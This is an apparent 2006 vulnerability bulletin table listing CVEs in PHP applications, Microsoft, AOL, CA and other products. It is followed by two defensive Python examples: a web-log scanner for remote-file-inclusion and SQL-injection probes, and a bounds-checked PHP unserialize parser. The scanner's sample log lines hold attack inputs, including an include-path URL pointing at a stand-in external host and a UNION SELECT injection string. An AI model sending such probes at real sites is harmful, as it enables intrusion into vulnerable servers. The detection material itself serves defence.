| Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info |
|---|---|---|---|---|
| 4homepages -- 4images | SQL injection vulnerability in search.php in 4images 1.7.x allows remote authenticated users to execute arbitrary SQL commands via the search_user parameter. | | 7.0 | CVE-2006-5236, BUGTRAQ, OTHER-REF, OTHER-REF, BID, XF |
| AAIportal -- AAIportal | Multiple SQL injection vulnerabilities in AAIportal before 1.4.0 allow remote attackers to execute arbitrary SQL commands via unspecified vectors. | | 7.0 | CVE-2006-5225, OTHER-REF, OTHER-REF, FRSIRT, SECUNIA |
| Adobe -- ColdFusion MX | Unspecified vulnerability in a Verity third-party library, as used on Adobe ColdFusion MX 7 through MX 7.0.2 and possibly other products, allows local users to execute arbitrary code via unknown attack vectors. | | 7.0 | CVE-2006-3978, OTHER-REF |
| Adobe -- Contribute Publishing Server | Adobe Contribute Publishing Server leaks the administrator password in logs that are created during product installation, which allows local users to gain privileges to the server. | | 7.0 | CVE-2006-5199, ADOBE |
| AOL -- YGP Screensaver ActiveX Control | Buffer overflow in AOL You've Got Pictures (YGP) Screensaver ActiveX control allows remote attackers to execute arbitrary code via unspecified vectors. | | 7.0 | CVE-2006-3887, OTHER-REF, CERT-VN |
| AOL -- YGP Pic Downloader ActiveX Control | Buffer overflow in AOL You've Got Pictures (YGP) Pic Downloader ActiveX control allows remote attackers to execute arbitrary code via unspecified vectors. | | 7.0 | CVE-2006-3888, OTHER-REF, CERT-VN |
| AOL -- AOL Security Edition | Buffer overflow in the YGPPDownload ActiveX Control (AOL.PicDownloadCtrl.1, YGPPicDownload.dll) in America Online 9.0 Security Edition allows remote attackers to execute arbitrary code via a long argument to the SetAlbumName method. | | 7.0 | CVE-2006-4840, IDEFENSE |
| Baumedia -- Newswriter | PHP remote file inclusion vulnerability in include/main.inc.php in Sebastian Baumann and Philipp Wolfer Newswriter SW 1.42 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the NWCONF_SYSTEM[server_path] parameter, a different vector than CVE-2006-5102. | | 7.0 | CVE-2006-5180, BUGTRAQ, OTHER-REF |
| Blue Smiley Organizer -- Blue Smiley Organizer | SQL injection vulnerability in Blue Smiley Organizer before 4.46 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. | | 7.0 | CVE-2006-5237, OTHER-REF, BID, FRSIRT, SECUNIA |
| Bulletin Board Ace -- Bulletin Board Ace | PHP remote file inclusion vulnerability in includes/functions.php in Bulletin Board Ace (BBaCE) 3.5 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter. | | 7.0 | CVE-2006-5187, Milw0rm, BID, FRSIRT, SECUNIA, XF |
| Cahier de textes -- Cahier de textes | Multiple SQL injection vulnerabilities in Cahier de textes 2.0 allow remote attackers to execute arbitrary SQL commands via the (1) matiere_ID parameter in lire.php or the (2) classe_ID parameter in lire_a_faire.php. | | 7.0 | CVE-2006-5221, BUGTRAQ, OTHER-REF, BID, FRSIRT, SECUNIA |
| Computer Associates -- BrightStor ARCServe Backup | Stack-based buffer overflow in CA BrightStor ARCserve Backup R11.5 client and server allows remote attackers to execute arbitrary code via long messages to the CheyenneDS Mailslot. | | 7.0 | CVE-2006-5142, OTHER-REF, OTHER-REF |
| Computer Associates -- BrightStor ARCServe Backup; Computer Associates -- BrightStor Enterprise Backup; Computer Associates -- Business Protection Suite | Stack-based buffer overflow in the Backup Agent RPC Server (DBASVR.exe) as used in CA BrightStor ARCserve Backup R11.5, Enterprise Backup 10.5, ARCserve Backup v9.01, and Protection Suite r2 allows remote attackers to execute arbitrary code via the RPC routines with opcode (1) 0x01, (2) 0x02, and (3) 0x18. | | 7.0 | CVE-2006-5143, OTHER-REF, OTHER-REF, OTHER-REF |
| Dan Jensen -- Travelsized CMS | PHP remote file inclusion vulnerability in frontpage.php in Dan Jensen Travelsized CMS 0.4 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the setup_folder parameter. | | 7.0 | CVE-2006-5182, OTHER-REF, BID, FRSIRT, SECUNIA, XF |
| Dayfox Designs -- Dayfox Blog | Multiple PHP remote file inclusion vulnerabilities in Dayfox Designs Dayfox Blog 2.0 allow remote attackers to execute arbitrary PHP code via a URL in the slogin parameter in the (1) adminlog.php, (2) postblog.php, (3) index.php, or (4) index2.php script in /edit. | | 7.0 | CVE-2006-5183, BUGTRAQ, XF |
| Deep CMS -- Deep CMS | PHP remote file inclusion vulnerability in index.php in Deep CMS 2.0a allows remote attackers to execute arbitrary PHP code via a URL in the ConfigDir parameter. NOTE: the provenance of this information is unknown; the details are obtained from third party information. | | 7.0 | CVE-2006-5251, BID |
| DeltaScripts -- PHP Classifieds | Multiple SQL injection vulnerabilities in PHP Classifieds 7.1 allow remote attackers to execute arbitrary SQL commands via (1) the catid_search parameter in search.php and (2) the catid parameter in index.php. | | 7.0 | CVE-2006-5208, OTHER-REF, Milw0rm, BID, FRSIRT, XF |
| Dimension of phpBB -- Dimension of phpBB | Multiple PHP remote file inclusion vulnerabilities in Dimension of phpBB 0.2.6 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter in (1) includes/themen_portal_mitte.php or (2) includes/logger_engine.php. | | 7.0 | CVE-2006-5222, OTHER-REF, BID, FRSIRT, SECUNIA, XF |
| Dimension of phpBB -- Dimension of phpBB | PHP remote file inclusion vulnerability in includes/functions_kb.php in Dimension of phpBB 0.2.6 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter. NOTE: the provenance of this information is unknown; the details are obtained from third party information. | | 7.0 | CVE-2006-5235, FRSIRT |
| Dimitri Seitz -- Security Suite IP Logger | PHP remote file inclusion vulnerability in includes/logger_engine.php in Dimitri Seitz Security Suite IP Logger 1.0.0 in dwingmods for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter. | | 7.0 | CVE-2006-5224, OTHER-REF, BID, FRSIRT, SECUNIA, XF |
| Eazy Cart -- Eazy Cart | Eazy Cart allows remote attackers to bypass authentication and gain administrative access via a direct request for admin/home/index.php, and possibly other PHP scripts under admin/. | | 10.0 | CVE-2006-5245, BUGTRAQ, OTHER-REF, OTHER-REF, SECUNIA |
| Eazy Cart -- Eazy Cart | Multiple cross-site scripting (XSS) vulnerabilities in Eazy Cart allow remote attackers to inject arbitrary web script or HTML via easycart.php, possibly related to the (1) des and (2) qty parameters in an add action, and via other unspecified vectors. NOTE: some details are obtained from third party information. | | 7.0 | CVE-2006-5247, BUGTRAQ, OTHER-REF, OTHER-REF, SECUNIA |
| Emek Portal -- Emek Portal | SQL injection vulnerability in giris_yap.asp in Emek Portal 2.1 allows remote attackers to execute arbitrary SQL commands by simultaneously injecting into the user name and pass fields in uyegiris.asp, also known as the Kullanici Adi (k_a) and Sifre (sifre) parameters. | | 7.0 | CVE-2006-5217, BUGTRAQ, BID |
| FreeForum -- FreeForum | PHP remote file inclusion vulnerability in forum.php in FreeForum 0.9.7 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the fpath parameter. | | 7.0 | CVE-2006-5230, BUGTRAQ, OTHER-REF, BID |
| Freenews -- Freenews | PHP remote file inclusion vulnerability in moteur/moteur.php in Prologin.fr Freenews 1.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the chemin parameter. | | 7.0 | CVE-2006-5226, BUGTRAQ, OTHER-REF, BID |
| HAMweather -- HAMweather | Eval injection vulnerability in Template.php in HAMweather 3.9.8.4 and earlier allows remote attackers to execute arbitrary code via a modified query string, which is supplied to an eval function call within the do_parse_code function. | | 7.0 | CVE-2006-5185, OTHER-REF, OTHER-REF, BID, FRSIRT, SECUNIA, XF |
| Invision Power Services -- Invision Gallery | SQL injection vulnerability in Invision Gallery 2.0.7 allows remote attackers to execute arbitrary SQL commands via the album parameter in (1) index.php and (2) forum/index.php, when the rate command in the gallery automodule is used. | | 7.0 | CVE-2006-5206, Milw0rm, BID, XF |
| iSearch -- iSearch | ** DISPUTED ** Multiple PHP remote file inclusion vulnerabilities in iSearch 2.16 allow remote attackers to execute arbitrary PHP code via a URL in the isearch_path parameter in (1) index.php, (2) viewcache.php, (3) sitemap.php, (4) isearch.inc.php, (5) google_sitemap.php, (6) stats.php, or (7) auto_spider_img.php. NOTE: this issue has been disputed by a third party who shows that $isearch_path is set to a constant value. CVE analysis as of 2006-10-10 is inconclusive, although the original researcher is known to make mistakes. | | 7.0 | CVE-2006-5232, BUGTRAQ, BUGTRAQ, BID |
| Joshua Muheim -- phpMyWebmin | Multiple PHP remote file inclusion vulnerabilities in Joshua Muheim phpMyWebmin 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the target parameter in (1) change_preferences2.php, (2) create_file.php, (3) upload_local.php, and (4) upload_multi.php, different vectors than CVE-2006-5124. | | 7.0 | CVE-2006-5181, BUGTRAQ, OTHER-REF, SECUNIA, XF |
| Klinza -- Klinza Professional CMS | PHP remote file inclusion vulnerability in funzioni/lib/show_hlp.php in Klinza Professional CMS 5.0.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the appl[APPL] parameter. | | 7.0 | CVE-2006-5189, Milw0rm, BID, XF |
| MailEnable -- MailEnable Enterprise; MailEnable -- MailEnable Professional | Buffer overflow in NTLM authentication in MailEnable Professional 2.0 and Enterprise 2.0 allows remote attackers to execute arbitrary code via "the signature field of NTLM Type 1 messages". | | 7.0 | CVE-2006-5176, OTHER-REF, OTHER-REF, BID, FRSIRT, SECUNIA, XF |
| MailEnable -- MailEnable Enterprise; MailEnable -- MailEnable Professional | The NTLM authentication in MailEnable Professional 2.0 and Enterprise 2.0 allows remote attackers to (1) execute arbitrary code via unspecified vectors involving crafted base64-encoded NTLM Type 3 messages, or (2) cause a denial of service via crafted base64-encoded NTLM Type 1 messages, which trigger a buffer over-read. | | 7.0 | CVE-2006-5177, OTHER-REF, OTHER-REF, BID, FRSIRT, SECUNIA, XF, XF |
| Microsoft -- .NET Framework | Cross-site scripting (XSS) vulnerability in Microsoft .NET Framework 2.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving "ASP.NET controls that set the AutoPostBack property to true". | | 7.0 | CVE-2006-3436, MS |
| Microsoft -- XML Core Services; Microsoft -- XML Parser | Buffer overflow in the Extensible Stylesheet Language Transformations (XSLT) processing in Microsoft XML Parser 2.6 and XML Core Services 3.0 through 6.0 allows remote attackers to execute arbitrary code via a crafted Web page. | | 7.0 | CVE-2006-4686, MS |
| Microsoft -- Windows 2000; Microsoft -- Windows Server 2003; Microsoft -- Windows XP | Unspecified vulnerability in the Server service in Microsoft Windows 2000 SP4, Server 2003 SP1 and earlier, and XP SP2 and earlier allows remote attackers to execute arbitrary code via a crafted packet, aka "SMB Rename Vulnerability." | | 7.0 | CVE-2006-4696, MS |
| Minichat -- Minichat | PHP remote file inclusion vulnerability in ftag.php in Minichat 6.0 allows remote attackers to execute arbitrary PHP code via a URL in the mostrar parameter. | | 7.0 | CVE-2006-5283, Milw0rm, FRSIRT, SECUNIA |
| navyism -- n@board | PHP remote file inclusion vulnerability in naboard_pnr.php in n@board 3.1.9e and earlier allows remote attackers to execute arbitrary PHP code via a URL in the skin parameter. | | 7.0 | CVE-2006-5281, Milw0rm, FRSIRT, SECUNIA, XF |
| Nivisec -- User Viewed Posts Tracker | PHP remote file inclusion vulnerability in includes/functions_user_viewed_posts.php in the Nivisec User Viewed Posts Tracker module 1.0 and earlier for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter. | | 7.0 | CVE-2006-5223, BUGTRAQ, OTHER-REF, BID, FRSIRT, SECUNIA |
| Objective Development -- WebYep | Multiple PHP remote file inclusion vulnerabilities in WebYep 1.1.9, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via the webyep_sIncludePath parameter in (1) files in the programm/lib/ directory including (a) WYApplication.php, (b) WYDocument.php, (c) WYEditor.php, (d) WYElement.php, (e) WYFile.php, (f) WYHTMLTag.php, (g) WYImage.php, (h) WYLanguage.php, (i) WYLink.php, (j) WYPath.php, (k) WYPopupWindowLink.php, (l) WYSelectMenu.php, and (m) WYTextArea.php; (2) files in the programm/elements/ directory including (n) WYGalleryElement.php, (o) WYGuestbookElement.php, (p) WYImageElement.php, (q) WYLogonButtonElement.php, (r) WYLongTextElement.php, (s) WYLoopElement.php, (t) WYMenuElement.php, and (u) WYShortTextElement.php; and (3) programm/webyeb.php. | | 7.0 | CVE-2006-5220, BUGTRAQ, BID |
| OpenDock -- Easy Doc | Multiple PHP remote file inclusion vulnerabilities in OpenDock Easy Doc 1.4 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the doc_directory parameter in (1) down_stat.php, (2) file.php, (3) find_file.php, (4) lib_file.php, and (5) lib_form_file.php in sw/lib_up_file/; (6) find_comment.php, (7) comment.php, and (8) lib_comment.php in sw/lib_comment/; (9) sw/lib_find/find.php; and other unspecified PHP scripts. | | 7.0 | CVE-2006-5243, BUGTRAQ, ECHO, BID, FRSIRT, SECTRACK, SECUNIA, XF |
| PHP -- PHP | Integer overflow in PHP 5 up to 5.1.6 and 4 before 4.3.0 allows remote attackers to execute arbitrary code via an argument to the unserialize PHP function with a large value for the number of array elements, which triggers the overflow in the Zend Engine ecalloc function (Zend/zend_alloc.c). | | 7.0 | CVE-2006-4812, BUGTRAQ, OTHER-REF, OTHER-REF, OTHER-REF, REDHAT, BID, FRSIRT, SECTRACK, SECUNIA, XF |
| phpBB Group -- phpBB | PHP remote file inclusion vulnerability in admin/admin_topic_action_logging.php in Admin Topic Action Logging Mod 0.95 and earlier, as used in phpBB 2.0 up to 2.0.21, allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter. | | 7.0 | CVE-2006-5209, Milw0rm, XF |
| phpGreetz -- phpGreetz | PHP remote file inclusion vulnerability in includes/footer.php in phpGreetz 0.99 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the PHPGREETZ_INCLUDE_DIR parameter. | | 7.0 | CVE-2006-5192, OTHER-REF, BID, FRSIRT, XF |
| phpWebSite -- phpWebSite | ** DISPUTED ** Multiple PHP remote file inclusion vulnerabilities in phpWebSite 0.10.2 allow remote attackers to execute arbitrary PHP code via a URL in the PHPWS_SOURCE_DIR parameter in (1) init.php, (2) users.php, (3) Cookie.php, (4) forms.php, (5) Groups.php, (6) ModSetting.php, (7) Calendar.php, (8) DateTime.php, (9) core.php, (10) ImgLibrary.php, (11) Manager.php, (12) Template.php, and (13) EZform.php. NOTE: CVE disputes this report, since "PHPWS_SOURCE_DIR" is defined as a constant, not accessed as a variable. | | 7.0 | CVE-2006-5234, BUGTRAQ, MLIST, BID |
| PKR Internet -- Taskjitsu | SQL injection vulnerability in PKR Internet Taskjitsu before 2.0.6 allows remote attackers to execute arbitrary SQL commands via the key parameter, when the limit query parameter is set to customerid. | | 7.0 | CVE-2006-5184, OTHER-REF, BID, SECUNIA |
| Python Software Foundation -- Python | Buffer overflow in the repr function in Python 2.3 through 2.6 before 20060822 allows context-dependent attackers to cause a denial of service and possibly execute arbitrary code via crafted wide character UTF-32/UCS-4 strings to certain scripts. | | 7.0 | CVE-2006-4980, OTHER-REF, OTHER-REF, OTHER-REF, OTHER-REF, UBUNTU, BID, SECUNIA, SECUNIA |
| Red Hat -- Red Hat Fedora Core; Red Hat -- Red Hat Enterprise Linux | pam_ldap in nss_ldap on Red Hat Enterprise Linux 4, Fedora Core 3 and earlier, and possibly other distributions does not return an error condition when an LDAP directory server responds with a PasswordPolicyResponse control response, which causes the pam_authenticate function to return a success code even if authentication has failed, as originally reported for xscreensaver. | | 7.0 | CVE-2006-5170, OTHER-REF |
| Rob Hensley -- AckerTodo | Multiple SQL injection vulnerabilities in the Google Gadget login.php (gadget/login.php) in Rob Hensley ackerTodo 4.2 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) up_login, (2) up_pass, or (3) up_num_tasks parameters. | | 7.0 | CVE-2006-5228, BUGTRAQ, OTHER-REF, OTHER-REF, BID, FRSIRT, SECTRACK, SECUNIA, XF |
| Sergey Lyubka -- Simple HTTPD | Stack-based buffer overflow in Sergey Lyubka Simple HTTPD (shttpd) 1.34 allows remote attackers to execute arbitrary code via a long URI. | | 7.0 | CVE-2006-5216, OTHER-REF, FRSIRT, SECUNIA, XF |
| SH-News -- SH-News | Multiple PHP remote file inclusion vulnerabilities in SH-News 3.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the scriptpath parameter to (1) report.php, (2) archive.php, (3) comments.php, (4) init.php, or (5) news.php. | | 7.0 | CVE-2006-5282, Milw0rm, BID, FRSIRT, SECUNIA |
| TagIt! -- Tagboard | PHP remote file inclusion vulnerability in tagmin/delTagUser.php in TagIt! Tagboard 2.1.B Build 2 (tagit2b) allows remote attackers to execute arbitrary PHP code via a URL in the configpath parameter. | | 7.0 | CVE-2006-5249, BUGTRAQ, MLIST |
| TorrentFlux -- TorrentFlux | Cross-site scripting (XSS) vulnerability in admin.php in TorrentFlux 2.1 allows remote attackers to inject arbitrary web script or HTML via (1) the $user_agent variable, probably obtained from the User-Agent HTTP header, and possibly (2) the $ip_resolved variable. | | 7.0 | CVE-2006-5227, BUGTRAQ, OTHER-REF, BID, SECTRACK, SECUNIA, XF |
| Wheatblog -- Wheatblog | Multiple cross-site scripting (XSS) vulnerabilities in Wheatblog 1.0 and 1.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained from third party information. | | 7.0 | CVE-2006-5195, BID |
| WikyBlog -- WikyBlog | PHP remote file inclusion vulnerability in index.php in Josh Schmidt WikyBlog 1.2.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the includeDir parameter. | | 7.0 | CVE-2006-5193, BUGTRAQ, BUGTRAQ, BID, XF |
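Most of the PHP entries above share two shapes: an include-path variable (phpbb_root_path, configpath, scriptpath, includeDir, fpath and the others named in the table) that register_globals lets a client overwrite with a URL, and a query parameter (search_user, catid, album, k_a and the rest) that reaches a SQL string unquoted. A web server log is often the only place a defender can see either being probed. The script below is an added example, not code from the bulletin or from any of the listed vendors; it walks combined-format access-log lines, looks for those parameter names, and flags a URL scheme in an include-path parameter or SQL metacharacters in a listed injectable parameter. The parameter groupings, the marker patterns and the five log lines are constructed for the example and are not taken from any real incident; the log line format is the common Apache combined format.

```python
"""Flag requests matching the RFI and SQLi parameter patterns in this bulletin."""
import re
from urllib.parse import parse_qsl, urlsplit

# Include-path parameters named in the bulletin's RFI entries (assumed
# grouping for this example). A browser never needs to send these; a client-
# supplied value that is a URL is the classic register_globals RFI probe.
RFI_PARAMS = {
    "phpbb_root_path", "configpath", "scriptpath", "includeDir", "fpath",
    "chemin", "mostrar", "skin", "doc_directory", "webyep_sIncludePath",
    "PHPGREETZ_INCLUDE_DIR", "setup_folder", "ConfigDir", "slogin",
    "target", "isearch_path", "PHPWS_SOURCE_DIR",
    "NWCONF_SYSTEM[server_path]", "appl[APPL]",
}
# Parameters named in the bulletin's SQL injection entries (same caveat).
SQLI_PARAMS = {
    "search_user", "matiere_ID", "classe_ID", "catid", "catid_search",
    "album", "key", "k_a", "sifre", "up_login", "up_pass", "up_num_tasks",
}

URL_SCHEME = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)
SQLI_MARKERS = re.compile(r"'|\bunion\b|\bselect\b|--|/\*|;", re.IGNORECASE)

# Apache combined log format; everything after the status code is ignored.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_target(target):
    """Return a list of (kind, param, value) findings for one request target.

    kind is 'rfi' for a URL in an include-path parameter, 'include-path' for
    any other client-supplied include-path parameter (still worth a look),
    and 'sqli' for SQL metacharacters in a listed injectable parameter.
    """
    findings = []
    # parse_qsl percent-decodes names and values, so %5B/%5D become brackets
    # and the bracketed names above match as written.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in RFI_PARAMS:
            kind = "rfi" if URL_SCHEME.match(value) else "include-path"
            findings.append((kind, name, value))
        elif name in SQLI_PARAMS and SQLI_MARKERS.search(value):
            findings.append(("sqli", name, value))
    return findings


def scan_log(lines):
    """Return a list of (ip, status, kind, param, value) for suspicious requests."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line in the expected format; skip, don't guess
        for kind, name, value in classify_target(m.group("target")):
            hits.append((m.group("ip"), int(m.group("status")), kind, name, value))
    return hits


# Constructed sample log lines (not real traffic); 203.0.113.0/24 and
# 198.51.100.0/24 are documentation address ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2006:12:00:01 +0000] "GET /forum/includes/functions_kb.php?phpbb_root_path=http://203.0.113.9/c.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [10/Oct/2006:12:00:02 +0000] "GET /search.php?search_user=a%27%20UNION%20SELECT%201,2,3--%20 HTTP/1.1" 200 2048 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [10/Oct/2006:12:00:03 +0000] "GET /include/main.inc.php?NWCONF_SYSTEM%5Bserver_path%5D=ftp://203.0.113.9/x HTTP/1.1" 500 0 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [10/Oct/2006:12:00:04 +0000] "GET /index.php?catid=12 HTTP/1.1" 200 1024 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [10/Oct/2006:12:00:05 +0000] "GET /forum.php?fpath=./ HTTP/1.1" 200 1024 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The status code is carried through deliberately: an RFI probe that returned 200 against a script the table lists is the one to triage first, because the include may well have executed. Only single-level percent-encoding is decoded here; a scanner that double-encodes will slip past the SQL marker check, so treat this as a triage filter rather than a complete detector.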
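The PHP entry (CVE-2006-4812) is a different class from the rest of the table: unserialize() trusted the element count declared in an `a:N:{...}` array header and sized an allocation from it, so a huge N overflowed the size arithmetic in ecalloc. The parser below is an added example written for this page, not PHP's own code and not a patch; it reads the subset of the serialization format needed to show the point (null, bool, int, string, array) and applies the check the vulnerable path lacked: a declared string length or array count is compared against the bytes actually remaining before anything is sized from it. The six-byte minimum element size and the error class are this example's own assumptions.

```python
"""Minimal reader for PHP's serialize() format that bounds declared sizes first."""


class UnserializeError(ValueError):
    """Malformed input, including declared sizes the remaining input cannot hold."""


# Smallest possible array element: key "i:0;" (4 bytes) plus value "N;" (2 bytes).
MIN_ELEMENT_BYTES = 6


class _Reader:
    def __init__(self, data):
        self.data = data
        self.pos = 0

    def remaining(self):
        return len(self.data) - self.pos

    def expect(self, token):
        if not self.data.startswith(token, self.pos):
            raise UnserializeError(f"expected {token!r} at offset {self.pos}")
        self.pos += len(token)

    def read_int(self, terminator):
        end = self.data.find(terminator, self.pos)
        if end < 0:
            raise UnserializeError(f"unterminated number at offset {self.pos}")
        tok = self.data[self.pos:end]
        if not tok or not tok.lstrip(b"-").isdigit():
            raise UnserializeError(f"bad number {tok!r} at offset {self.pos}")
        self.pos = end + len(terminator)
        return int(tok)

    def value(self):
        tag = self.data[self.pos:self.pos + 1]
        self.pos += 1
        if tag == b"N":
            self.expect(b";")
            return None
        if tag == b"b":
            self.expect(b":")
            flag = self.read_int(b";")
            if flag not in (0, 1):
                raise UnserializeError("bool must be 0 or 1")
            return flag == 1
        if tag == b"i":
            self.expect(b":")
            return self.read_int(b";")
        if tag == b"s":
            self.expect(b":")
            length = self.read_int(b":")
            # The body plus the closing '";' must fit in what is left.
            if length < 0 or length + 3 > self.remaining():
                raise UnserializeError(f"string length {length} exceeds input")
            self.expect(b'"')
            body = self.data[self.pos:self.pos + length]
            self.pos += length
            self.expect(b'";')
            return body.decode("latin-1")
        if tag == b"a":
            self.expect(b":")
            count = self.read_int(b":")
            # The check the vulnerable ecalloc path lacked: refuse a count the
            # remaining bytes cannot encode before sizing anything from it.
            if count < 0 or count * MIN_ELEMENT_BYTES + 2 > self.remaining():
                raise UnserializeError(f"array count {count} exceeds input")
            self.expect(b"{")
            result = {}
            for _ in range(count):
                key = self.value()
                if not isinstance(key, (int, str)):
                    raise UnserializeError("array keys must be int or string")
                result[key] = self.value()
            self.expect(b"}")
            return result
        raise UnserializeError(f"unsupported type tag {tag!r} at offset {self.pos - 1}")


def php_unserialize(data):
    """Parse one serialized PHP value from bytes, rejecting trailing garbage."""
    reader = _Reader(data)
    value = reader.value()
    if reader.remaining():
        raise UnserializeError(f"trailing data at offset {reader.pos}")
    return value


if __name__ == "__main__":
    print(php_unserialize(b'a:2:{i:0;s:1:"a";i:1;i:7;}'))
    try:
        php_unserialize(b"a:2147483647:{}")  # constructed oversized count
    except UnserializeError as exc:
        print("rejected:", exc)
```

The bound is deliberately coarse: it does not try to predict the real element sizes, only to prove that the declared count cannot be honest, which is enough to keep an allocation from ever being derived from attacker-controlled arithmetic. Objects (`O:`) and references are left unsupported on purpose; a parser that does not need them should refuse them rather than grow attack surface.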